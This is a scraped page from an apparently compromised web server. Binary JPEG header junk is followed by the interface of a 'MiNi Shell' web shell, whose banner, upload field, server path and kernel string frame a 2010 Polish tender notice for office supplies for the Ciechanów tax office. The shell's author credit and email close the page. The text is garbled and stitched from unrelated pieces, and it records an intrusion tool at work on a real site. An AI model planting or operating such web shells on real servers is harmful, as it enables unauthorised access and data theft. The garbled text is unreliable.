JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100409/100604-N-2010.html

<p class="kh_header"><b>Ciechanów: Dostawa artykułów biurowych, papieru kserograficznego, materiałów eksploatacyjnych  oraz  akcesoriów  komputerowych dla
Urzędu Skarbowego w Ciechanowie</b><br>
<b>Numer ogłoszenia: 100604 - 2010; data zamieszczenia: 09.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w  Ciechanowie , ul. Warszawska 58, 06-400 Ciechanów, woj. mazowieckie, tel. 023 6723538, 6724439 w. 221, faks 023 6723538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.is.waw.pl/usciechanow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych, papieru kserograficznego, materiałów eksploatacyjnych  oraz  akcesoriów  komputerowych dla
Urzędu Skarbowego w Ciechanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Papier ksero A4, gramatura 80g na m2, białość min. CIE 160 - 650 ryz,	Papier ksero A3, gramatura 80g na m2 - 10  ryz,  Blok z makulatury, wydzierany w kratkę, A5 (96-kartkowy) - 30 szt., Blok z makulatury, wydzierany w kratkę,  A4 (96-kartkowy) 20szt., Koperta z rozszerzanym bokiem B4, samoprzylepna - 250 szt., Koperta biała, samoprzylepna B4 - 1000 szt., Koperta biała, samoprzylepna B5 - 1000 szt., Koperta biała, samoprzylepna C6 - 6000 szt., Koperta biała, samoprzylepna C6 z oknem prawy dół - 3000 szt., Koperta biała, samoprzylepna 110x220 z oknem prawy dół -14000 szt, Karteczki samoprzylepne w bloczku o wym. 76x76 mm -  80 bl., Karteczki samoprzylepne w bloczku o wym. 51x38 mm - 20 bl., Teczka wiązana A4, z kartonu 275 g na m2 - 5200 szt., Skoroszyt zwykły biały A4, z kartonu 275 g na m2 - 2300 szt., Skoroszyt oczkowy biały A4, z kartonu 275 g na m2 - 500 szt., Tusz do stempli gumowych, czerwony, buteleczka 25 ml - 68 szt., Zszywacz zszywający min.15 kartek - 24 na 6 - 13 szt., Zeszyt A5 32K, kratka - 20 szt,. Zeszyt A5 60K, kratka - 20 szt., Zeszyt A4 96K, kratka, oprawa twarda - 20 szt., Kartoteka magazynowa ilościowa A5 - 100 szt., Mazak czarny - 40 szt.,Mazak niebieski - 20 szt., Wkład do długopisu typu PENTEL BK 101 lub odpowiadające, kolor niebieski - 150 szt., Wkład do długopisu typu PENTEL BK 101 lub odpowiadające, kolor czarny - 50 szt., Zakreślacz żółty - 70 szt., Zakreślacz różowy - 5 szt., Zakreślacz zielony - 5 szt., Zakreślacz pomarańczowy - 5 szt. Wkład krótki, kolor niebieski - 40 szt., Wkład niebieski do pióra kulkowego typu Parker - 10 szt., Wkład typu UMR-87, żelowy, niebieski 0,7mm do pióra typu LANCELOT lub mu odpowiadający - 10 szt., Wkład metalowy do długopisu typu Zenith, kolor niebieski - 40 szt., Spinacz okrągły R28 - 130 op., Spinacz okrągły R50 - 10 op., Zszywki 24 na 6 - 240 op., Segregator A4, szer. 75mm, z metalowymi okuciami na krawędziach dolnych - 100szt., Segregator A4, szer. 50mm, z metalowymi okuciami na krawędziach dolnych - 75 szt., Segregator A5, szer. 75mm, z metalowymi okuciami na krawędziach dolnych - 20 szt., Skoroszyt plastikowy miękki, A4, z tylną okładką kolorową z przodu z przezroczystą - 60szt, Poduszka do stempli o wymiarach 70 x 110 mm, nasączona czerwonym tuszem  - 40szt., Taśma bezbarwna, samoprzylepna 18x20mm - 74 szt., Etykiety samoprzylepne do frankownicy, o wymiarach 140mm x 81,5mm - 1000 szt., Dziurkacz metalowy  z ogranicznikiem formatu na 2 dziurki, dziurkowanie do 40 kartek - 10szt., Ołówek z gumką wykonany z żywicy syntetycznej, z niełamliwym grafitem - 95 szt., Plastelina brązowa 0,5 kg, Klej biurowy w sztyfcie do klejenia papieru i tektury, op. 22g - 24szt., Nożyczki biurowe wykonane ze stali nierdzewnej, długość ostrza ok. 10cm  - 40 szt., Rozszywacz do zszywek 24 na 6 - 20 szt., Rolka offset 57 na 30 - 50 szt.,Karta drogowa SM101, bloczek 100K - 4 bl., Gumka ołówkowa, do stosowania na papierze - 50 szt., Identyfikator z klipsem i agrafką, wykonany z przezroczystego, sztywnego tworzywa o wym.57 x 90 mm - 50 szt., Kwitariusz przychodowy K-103 A5 - 30 bl., Długopis typu Pentel BK- 101 lub mu odpowiadający, gumowy uchwyt, wymienny wkład, kolor niebieski - 150 szt., Klipsy do papieru, wykonane z metalu,  32 mm - 2 op., Koperta biała, samoprzylepna 110x220 - 2000 szt., Wkład atramentowy czarny  HP 56 (C6656AE),  minimalna ilość wydrukowanych storn A4 przy 5% zadruku  520 - 2 szt, Wkład atramentowy czarny o zwiększonej pojemności HP 10 (C4844AE) minimalna ilość wydrukowanych storn A4 przy 5% zadruku 1750 - 3 szt., Wkład z tonerem czarnym  HP Q2610A (10A) minimalna ilość wydrukowanych storn A4 przy 5% zadruku  6000- 1 szt., Wkład z tonerem czarnym o zwiększonej pojemności HP Q7551X (51X) minimalna ilość wydrukowanych storn A4 przy 5% zadruku 13000- 5 szt., Wkład z tonerem czarnym o zwiększonej pojemności (ML-D3050B) minimalna ilość wydrukowanych storn A4 przy 5% zadruku 8000- 2 szt., Wkład z tonerem czarnym o zwiększonej pojemności  (MLT-D2092L) minimalna ilość wydrukowanych storn A4 przy 5% zadruku 5000 - 10 szt., Kaseta z taśmą do druk. OKI 520 na 521 minimalna ilość znaków 4 mln. - 3 szt., Farba RISO S-3919E czarna 1000 ml. - 2 szt, Toner AR-270 T czarny minimalna ilość wydrukowanych storn A4 przy 5% zadruku 25000- 3 szt., Toner FQ-TF 15 czarny minimalna ilość wydrukowanych storn A4 przy 5% zadruku  60000- 2 szt., Myszka optyczna PS na 2 z rolką - 3 szt., Klawiatura PS na 2 - 5 szt., Kasetki do streamera DAT-DDS-4, 4mm, 150m, 20 na 40 GB - 10szt., Kasetki czyszczące do streamera DAT-DDS-4, 4mm - 2szt., Sprężone powietrze min. 400ml  - 2szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2, 30.12.51.10-5, 30.19.21.13-6, 30.23.72.00-1, 24.11.32.00-1, 32.58.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie  wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu mogą wziąć udział wykonawcy, którzy spełnią następujące warunki: posiadają wiedzę i doświadczenie do wykonania przedmiotowego zamówienia tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy,  w tym okresie -  należycie wykonali lub wykonują co najmniej 2 dostawy tonerów i atramentów do drukarek o wartości co najmniej  5.000 zł  każda  dostawa oraz  co najmniej 2 dostawy papieru kserograficznego i artykułów biurowych o wartości co najmniej  10.000 zł  każda  dostawa
Ocena spełniania wyżej wymienionego warunku będzie polegać na sprawdzeniu czy złożone przez wykonawców oświadczenia, dokumenty wymienione w części VI  SIWZ potwierdzają spełnienie warunków udziału  w postępowaniu określonych przez Zamawiającego w części V SIWZ. 
Sprawdzenie nastąpi wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W przypadku  oferowania tonerów lub atramentów równoważnych wykonawca złoży  dokumenty   stwierdzające spełnienie norm wskazanych w opisie przedmiotu 
zamówienia</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz cenowy, którego wzór stanowi załącznik nr 5 do  SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.is.waw.pl/usciechanow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Ciechanowie ul. Warszawska 58, 06 - 400 Ciechanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2010 godzina 10:00, miejsce: Siedziba Urzędu Skarbowego w Ciechanowie ul. Warszawska 58 pok. nr 38 w godzinach 7.30-15.30 lub przesłać pocztą na adres - Urząd Skarbowy w Ciechanowie ul. Warszawska 58.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com